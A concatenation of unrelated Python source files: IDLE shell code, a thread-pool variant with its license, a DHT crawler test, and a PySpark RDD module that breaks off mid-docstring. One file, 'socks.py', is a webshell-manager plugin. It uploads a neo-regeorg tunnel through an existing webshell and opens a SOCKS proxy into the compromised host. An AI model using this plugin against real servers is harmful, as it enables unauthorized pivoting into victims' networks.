self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.StackViewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super(PyShell, self).rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert', '<', 'iomark'):
return 'disabled'
return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if type(s) not in (unicode, str, bytearray):
# See issue #19481
if isinstance(s, unicode):
s = unicode.__getitem__(s, slice(None))
elif isinstance(s, str):
s = str.__str__(s)
elif isinstance(s, bytearray):
s = bytearray.__str__(s)
else:
raise TypeError('must be string, not ' + type(s).__name__)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
eol = line.find('\n', 0, size)
if eol >= 0:
size = eol + 1
self._line_buffer = line[size:]
return line[:size]
def close(self):
self.shell.close()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script, file=sys.stderr)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# start editor and/or shell windows:
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif TkVersion >= 8.5 and sys.platform != 'darwin':
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
root.tk.call('wm', 'iconphoto', str(root), "-default", *icons)
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if macosxSupport.isAquaTk():
# There are some screwed up <2> class bindings for text
# widgets defined in Tk which we need to do away with.
# See issue #24801.
root.unbind_class('Text', '<B2>')
root.unbind_class('Text', '<B2-Motion>')
root.unbind_class('Text', '<<PasteSelection>>')
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
Application.py
|
import threading
from Assistant import Assistant
class Application():
def __init__(self):
self.assistant = Assistant()
self.__run = True
def Start(self): # Function called once on start app
self.assistant.GreetingsUser()
self.assistant.ManageTrash()
def End(self): # Function called once on end app
self.__run = False
def Run(self): # Function called every time on start app
self.Start()
# while(self.__run):
threading.Thread(target=self.assistant.ManageHours).start()
threading.Thread(target=self.assistant.ManageDownloads).start()
|
threadpoolexecutor.py
|
"""
Modified ThreadPoolExecutor to support threads leaving the thread pool
This includes a global `secede` method that a submitted function can call to
have its thread leave the ThreadPoolExecutor's thread pool. This allows the
thread pool to allocate another thread if necessary and so is useful when a
function realises that it is going to be a long-running job that doesn't want
to take up space. When the function finishes its thread will terminate
gracefully.
This code copies and modifies two functions from the
`concurrent.futures.thread` module, notably `_worker` and
ThreadPoolExecutor._adjust_thread_count` to allow for checking against a global
`threading.local` state. These functions are subject to the following license,
which is included as a comment at the end of this file:
https://docs.python.org/3/license.html
... and are under copyright by the Python Software Foundation
Copyright 2001-2016 Python Software Foundation; All Rights Reserved
"""
from __future__ import print_function, division, absolute_import
from concurrent.futures import thread
import logging
from threading import local, Thread
from .compatibility import get_thread_identity
logger = logging.getLogger(__name__)
thread_state = local()
def _worker(executor, work_queue):
thread_state.proceed = True
thread_state.executor = executor
try:
while thread_state.proceed:
task = work_queue.get()
if task is not None: # sentinel
task.run()
del task
elif thread._shutdown or executor is None or executor._shutdown:
work_queue.put(None)
return
del executor
except BaseException:
logger.critical('Exception in worker', exc_info=True)
finally:
del thread_state.proceed
del thread_state.executor
class ThreadPoolExecutor(thread.ThreadPoolExecutor):
def _adjust_thread_count(self):
if len(self._threads) < self._max_workers:
t = Thread(target=_worker, args=(self, self._work_queue))
t.daemon = True
self._threads.add(t)
t.start()
def secede():
""" Have this thread secede from the ThreadPoolExecutor """
thread_state.proceed = False
ident = get_thread_identity()
for t in thread_state.executor._threads:
if t.ident == ident:
thread_state.executor._threads.remove(t)
break
"""
PSF LICENSE AGREEMENT FOR PYTHON 3.5.2
======================================
1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and
the Individual or Organization ("Licensee") accessing and otherwise using Python
3.5.2 software in source or binary form and its associated documentation.
2. Subject to the terms and conditions of this License Agreement, PSF hereby
grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,
analyze, test, perform and/or display publicly, prepare derivative works,
distribute, and otherwise use Python 3.5.2 alone or in any derivative
version, provided, however, that PSF's License Agreement and PSF's notice of
copyright, i.e., "Copyright c 2001-2016 Python Software Foundation; All Rights
Reserved" are retained in Python 3.5.2 alone or in any derivative version
prepared by Licensee.
3. In the event Licensee prepares a derivative work that is based on or
incorporates Python 3.5.2 or any part thereof, and wants to make the
derivative work available to others as provided herein, then Licensee hereby
agrees to include in any such work a brief summary of the changes made to Python
3.5.2.
4. PSF is making Python 3.5.2 available to Licensee on an "AS IS" basis.
PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR
WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE
USE OF PYTHON 3.5.2 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 3.5.2
FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 3.5.2, OR ANY DERIVATIVE
THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
6. This License Agreement will automatically terminate upon a material breach of
its terms and conditions.
7. Nothing in this License Agreement shall be deemed to create any relationship
of agency, partnership, or joint venture between PSF and Licensee. This License
Agreement does not grant permission to use PSF trademarks or trade name in a
trademark sense to endorse or promote products or services of Licensee, or any
third party.
8. By copying, installing or otherwise using Python 3.5.2, Licensee agrees
to be bound by the terms and conditions of this License Agreement.
"""
|
test.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import logging
from multiprocessing import Process
from dht_tracker.web import web_start
from dht_tracker.dht import BaseDHT,KRPC,KTable,NormalDHT,DHTSpider
from dht_tracker.common import netcount,sync
logging.basicConfig(level=logging.DEBUG,
format='[%(asctime)s][%(filename)s][%(funcName)s]LINE %(lineno)-4d : %(levelname)-8s %(message)s'
)
dhtser = NormalDHT()
#----------------------------------------------------------------------
def collect_on_get_peers(info,addr):
"""重写收集到的get_peers信息的处理
这里仅打印,以示例
"""
print "get_peers",(info,addr)
#----------------------------------------------------------------------
def collect_on_announce_peer(info,addr):
"""重写收集到的announce_peer信息的处理
这里仅打印,以示例
"""
print "announce_peer",(info,addr)
#----------------------------------------------------------------------
def recv_find_node_node(task,node):
"""重写对find_node任务返回的node信息的处理
这里仅打印,以示例
"""
print "find_node_node",task.id,node
#----------------------------------------------------------------------
def recv_get_peers_values(task,values):
"""重写对get_peers任务返回的values信息的处理
这里仅打印,以示例
"""
print "get_peers_values",task.id,values
dhtser.on_get_peers_info = collect_on_get_peers
dhtser.on_announce_peer_info = collect_on_announce_peer
dhtser.on_find_node_node = recv_find_node_node
dhtser.on_get_peers_values = recv_get_peers_values
dhtser.taskline.push("get_peers",'\x04\x03\xfbG(\xbdx\x8f\xbc\xb6~\x87\xd6\xfe\xb2A\xef8\xc7Z')
dhtser.start_dht()
#try:
#p = Process(target=dhtser.start_dht, args=())
#q = Process(target=web_start, args=())
#p.start()
#q.start()
#p.join()
#q.join()
#except Exception, e:
#logging.warning(e)
|
socks.py
|
from os import path
from re import match
from threading import Thread
from libs.config import alias, gget, color
from libs.myapp import send, base64_encode, randstr, ALPATHNUMERIC
from auxiliary.neoreg.x import init, generate, connectTunnel
def default_input(msg, value):
result = input("%s [%s]: " % (msg, value))
return result if result else value
@alias(True, _type="OTHER", k="key", code="httpcode", dns="local_dns", t="threads", l="listen_on", p="listen_port")
def run(key: str = 'doughnuts', threads: int = 1000, listen_on: str = "127.0.0.1", listen_port: int = 1080, httpcode: int = 200, read_buff: int = 513, connect_read_buf: int = 7, max_read_size: int = 512, read_interval: int = 300, write_interval: int = 200, local_dns: bool = False):
"""
socks
(DEVELOP) Start a socks server, upload and connect to the remote webshell tunnel for port mapping power by neo-regeorg.
eg: socks {key='doughnuts'} {threads=1000} {listen_on='127.0.0.1'} {listen_port=1080} {httpcode=200} {read_buff=513} {connect_read_buf=7} {max_read_size=512} {read_interval=300} {write_interval=200} {local_dns=False}
"""
name = randstr(ALPATHNUMERIC, 8) + ".php"
depr = gget("webshell.directory_separator", "webshell")
scheme = gget("webshell.scheme", "webshell")
netloc = gget("webshell.netloc", "webshell")
http_root_path = "%s://%s/" % (scheme, netloc)
web_root = gget("webshell.root", "webshell", "")
webshell_root = gget("webshell.webshell_root", "webshell", ".")
relpath = path.relpath(webshell_root + "/" + name, web_root)
tunnel_path = default_input("tunnel path", webshell_root + depr + name)
http_path = default_input("http path", http_root_path + relpath)
# init
init(key)
# generate
tunnel_content = generate(httpcode, read_buff, max_read_size)
res = send(
f"print(file_put_contents(base64_decode('{base64_encode(tunnel_path)}'), base64_decode('{base64_encode(tunnel_content)}')));")
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite tunnel {tunnel_path} success"))
else:
print(color.red(f"\nWrite tunnel {tunnel_path} failed"))
return
# connect
t = Thread(target=connectTunnel, args=(http_path, listen_on, listen_port, local_dns, connect_read_buf, read_interval, write_interval, threads))
t.setDaemon(True)
t.start()
print(color.green(f"\nStart socks server on {listen_on}:{listen_port} success\n"))
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from math import sqrt, log
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
This function returns consistant hash code for builtin types, especially
for None and tuple with None.
The algrithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1))
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= 0xffffffff
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
def _extract_concise_traceback():
"""
This function returns the traceback info for a callsite, returns a dict
with function name, file name and line number
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame - 1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
def __init__(self, sc):
tb = _extract_concise_traceback()
if tb is not None:
self._traceback = "%s at %s:%s" % (
tb.function, tb.file, tb.linenum)
else:
self._traceback = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
global _spark_stack_depth
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(self._traceback)
_spark_stack_depth += 1
def __exit__(self, type, value, tb):
global _spark_stack_depth
_spark_stack_depth -= 1
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
class MaxHeapQ(object):
"""
An implementation of MaxHeap.
>>> import pyspark.rdd
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(10)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(1)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> heap.getElements()
[0]
"""
def __init__(self, maxsize):
# We start from q[1], so its children are always 2 * k
self.q = [0]
self.maxsize = maxsize
def _swim(self, k):
while (k > 1) and (self.q[k / 2] < self.q[k]):
self._swap(k, k / 2)
k = k / 2
def _swap(self, i, j):
t = self.q[i]
self.q[i] = self.q[j]
self.q[j] = t
def _sink(self, k):
N = self.size()
while 2 * k <= N:
j = 2 * k
# Here we test if both children are greater than parent
# if not swap with larger one.
if j < N and self.q[j] < self.q[j + 1]:
j = j + 1
if(self.q[k] > self.q[j]):
break
self._swap(k, j)
k = j
def size(self):
return len(self.q) - 1
def insert(self, value):
if (self.size()) < self.maxsize:
self.q.append(value)
self._swim(self.size())
else:
self._replaceRoot(value)
def getElements(self):
return self.q[1:]
def _replaceRoot(self, value):
if(self.q[1] > value):
self.q[1] = value
self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(split, iterator):
return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD (relies on numpy and falls back
on default random generator if numpy is unavailable).
>>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
[2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
"""
assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD (currently requires
numpy).
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
